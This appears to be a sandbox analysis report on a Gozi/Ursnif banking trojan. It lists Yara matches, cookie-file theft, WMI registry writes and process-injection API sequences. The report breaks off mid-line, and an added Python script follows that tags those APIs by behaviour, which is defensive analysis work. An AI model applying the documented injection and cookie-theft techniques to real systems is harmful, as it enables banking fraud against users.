          Source: Yara match, File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
          Source: Yara match, File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
          Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
          Source: Yara match, File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: loaddll32.exe, 00000000.00000002.471966557.0000000000DCB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Detected Gozi e-Banking trojan
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_060222F7 lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_060222F7 lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
          Yara detected Ursnif
          Source: Yara match, same memory dumps and process memory spaces as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Win32.Gozi Author: CCN-CERT
          Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Win32.Gozi Author: CCN-CERT
          Writes registry values via WMI
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E4D23C5 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_032E4F73 GetProcAddress,NtCreateSection,memset
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_032E11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_032E34D0 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_032EB159 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06015E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06005E8A NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0601C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06008F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_060077B0 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0601FFF2 GetProcAddress,NtCreateSection,memset
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0600CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0600E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06010D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06022AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06025868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06022E10 NtQuerySystemInformation,RtlNtStatusToDosError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0600E6C4 memset,NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_060105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06002A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_0600A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06003934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
          Source: C:\Windows\System32\control.exe, Code function: 37_2_00509B4C NtQueryInformationProcess
          Source: C:\Windows\System32\control.exe, Code function: 37_2_004EF640 NtQueryInformationToken,NtQueryInformationToken,NtClose
          Source: C:\Windows\System32\control.exe, Code function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_06002410 CreateProcessAsUserW
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D21A40_2_6E4D21A4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9AD70_2_6E4E9AD7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F0EB00_2_6E4F0EB0
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E477E0_2_6E4E477E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F13F40_2_6E4F13F4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EA78C0_2_6E4EA78C
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EA3800_2_6E4EA380
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9FAC0_2_6E4E9FAC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EABAC0_2_6E4EABAC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EC0E80_2_6E4EC0E8
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F309D0_2_6E4F309D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F19380_2_6E4F1938
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032EAF341_2_032EAF34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E28E91_2_032E28E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060136041_2_06013604
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060216691_2_06021669
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060126781_2_06012678
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060276B01_2_060276B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601CFA31_2_0601CFA3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06023C5C1_2_06023C5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601BC931_2_0601BC93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600C3071_2_0600C307
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600BBA11_2_0600BBA1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060148041_2_06014804
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0602086C1_2_0602086C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F589037_2_004F5890
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F6B8037_2_004F6B80
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F285437_2_004F2854
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F386C37_2_004F386C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F206C37_2_004F206C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004FE80837_2_004FE808
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050E03837_2_0050E038
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E78F037_2_004E78F0
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050E09C37_2_0050E09C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F11DC37_2_004F11DC
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E49BC37_2_004E49BC
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050FA1037_2_0050FA10
          Source: C:\Windows\System32\control.exeCode function: 37_2_00506A2837_2_00506A28
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E42CC37_2_004E42CC
          Source: C:\Windows
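The native-API sequences in the code-function table above (NtWow64ReadVirtualMemory64, NtWriteVirtualMemory, NtUnmapViewOfSection, NtGet/SetContextThread, NtQueryKey, CreateProcessAsUserW) are the raw evidence behind verdicts such as "Writes to foreign memory regions" and "Modifies the context of a thread in another process". As an added example, not part of the Joe Sandbox report or of the sample's own code, the following Python parses lines of this table, tolerating the fused "exeCode function:" form the extraction produced, and tags each function by the behaviour its API list suggests. The tag names, the TAG_RULES mapping and the injection-chain rule are this example's own heuristics, not the sandbox's signature logic; the sample lines are copied from the table above.

```python
"""Tag native-API usage recorded in a sandbox 'Code function' table.

Added example, not part of the analysis report. Parses lines shaped like
    Source: <process> Code function: <id> <api>,<api>,...,<id>
and maps each code function to behaviour tags. TAG_RULES is this
example's own heuristic, not the sandbox vendor's signature logic.
"""
import re
from collections import defaultdict

# Constructed input: lines copied from the report's table above, in the
# raw extracted form ('exe' fused to 'Code function:', id repeated at the
# end, or, for functions with no resolved imports, id fused to itself).
SAMPLE_LINES = """\
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_06010D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_06010D8D
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_06022AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_06022AAC
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_0600F314
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_06025868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,1_2_06025868
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_060117CD
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError,1_2_06014518
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_0600A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_0600A818
Source: C:\\Windows\\SysWOW64\\rundll32.exeCode function: 1_2_06002410 CreateProcessAsUserW,1_2_06002410
Source: C:\\Windows\\System32\\control.exeCode function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_00521002
Source: C:\\Windows\\System32\\loaddll32.exeCode function: 0_2_6E4D21A40_2_6E4D21A4
"""

# The id is <pid>_<run>_<8 hex digits>; fixing the width lets the regex
# split a fused "0_2_6E4D21A40_2_6E4D21A4" at the right place.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>.*)$"
)

# Heuristic behaviour tags (this example's, not the sandbox's).
TAG_RULES = {
    "thread-context hijack": {"NtSetContextThread", "NtGetContextThread"},
    "foreign-memory write": {"NtWriteVirtualMemory"},
    "foreign-memory read": {"NtReadVirtualMemory", "NtWow64ReadVirtualMemory64"},
    "wow64 cross-bitness access": {"NtWow64QueryInformationProcess64",
                                   "NtWow64ReadVirtualMemory64"},
    "section unmapping": {"NtUnmapViewOfSection"},
    "memory protection change": {"NtProtectVirtualMemory"},
    "registry key query": {"NtQueryKey"},
    "token / run-as-user": {"NtQueryInformationToken", "CreateProcessAsUserW"},
    "dynamic API resolution": {"GetProcAddress"},
}


def parse_line(line):
    """Return {'source', 'id', 'apis'} for one table line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fid = m.group("fid")
    tokens = [t.strip() for t in m.group("rest").split(",")]
    # Drop empty tokens and the trailing repeat of the function id.
    apis = [t for t in tokens if t and t != fid]
    return {"source": m.group("src"), "id": fid, "apis": apis}


def tag_apis(apis):
    """Sorted list of tags whose API set intersects the function's APIs."""
    seen = set(apis)
    return sorted(tag for tag, names in TAG_RULES.items() if seen & names)


def classify(text):
    """Map every parseable line to its record, keyed by function id."""
    out = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            rec["tags"] = tag_apis(rec["apis"])
            out[rec["id"]] = rec
    return out


def summarize_by_process(results):
    """Per source process, the sorted union of its functions' tags."""
    summary = defaultdict(set)
    for rec in results.values():
        summary[rec["source"]].update(rec["tags"])
    return {proc: sorted(tags) for proc, tags in summary.items()}


def has_injection_chain(summary):
    """Per process: True when it both writes foreign memory and rewrites a
    thread context, the pairing that characterises thread-hijack injection."""
    needed = {"foreign-memory write", "thread-context hijack"}
    return {proc: needed <= set(tags) for proc, tags in summary.items()}


if __name__ == "__main__":
    results = classify(SAMPLE_LINES)
    for fid, rec in results.items():
        print(fid, rec["tags"] or "(no resolved imports)")
    print(has_injection_chain(summarize_by_process(results)))
```

Functions with an empty API list (the loaddll32.exe entries) are not harmless; they simply have no statically resolved imports, which is consistent with the report's "Contains functionality to dynamically determine API calls" verdict and is why GetProcAddress gets its own tag here.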